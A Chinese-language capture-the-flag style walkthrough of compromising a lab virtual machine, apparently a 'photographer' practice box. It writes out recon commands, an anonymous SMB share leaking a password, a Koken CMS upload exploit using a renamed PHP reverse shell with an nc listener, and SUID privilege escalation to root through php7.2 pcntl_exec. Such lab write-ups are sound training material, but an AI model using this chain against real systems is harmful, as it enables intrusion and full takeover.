废话不多说。下载安装先。
启动kali虚拟机
继续arp-scan -l查询目标ip
目标:192.168.163.130,使用浏览器访问验证
是目标地址
使用nmap -sS -A 192.168.163.130查询相关的端口信息
开放端口:80,139,445,8000
刚刚80端口这边我们已经访问过了,是纯静态的内容,逐一访问,发现8000端口存在一个CMS系统
是一个koken的cms,查询源码发现是0.22.24版本
使用nikto扫描工具扫描目录
nikto -h http://192.168.163.130:8000/
可能存在admin目录,我们访问一下试试看
页面设计的还不错。。。
登录需要邮箱。我们目前没有,查阅exp库发现koken版本0.22.24的上传漏洞
不过我没法登录,咋上传啊,首页也没有上传点呐
于是乎,这个漏洞只能后期用
刚刚我们发现存在445 139端口,具有smb的特征,那么,文件系统是否有值得我们搜索的东西呢
使用enum4linux探索445端口 enum4linux 192.168.163.130
没有账号密码,我们使用空密码连接挂载到我们本地目录下去
看到有两个文件,第一个似乎是什么邮件的文件,我们cat一下
那是密码吗?是邮箱号码?
agi@photographer.com 或者daisa@photographer.com 密码: babygirl
都试试看
登录成功
这样一来,刚刚的上传漏洞就能搞他了
使用Kali自带的php反弹脚本来进行利用
cp /usr/share/webshells/php/php-reverse-shell.php ~/yyssdd.php.jpg
改一下监听端口七七八八。
接下来上传,使用burp修改后缀名
访问我们刚刚上传的
另外在kali这边设置好监听
nc -lvnp 1234
监听好后开始访问,获取到反弹shell
接下来
python3 -c 'import pty;pty.spawn("/bin/bash")'
获取到交互式shell
接下来查询关键的具有suid访问权限的程序
find / -perm -u=s -type f 2>/dev/null
发现有一个php7.2的东东具有权限,我们利用php7.2获取到root权限
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
使用php7.2的exec调起sh执行
获取到root最高权
似乎是旗子,搞定
评论 (0)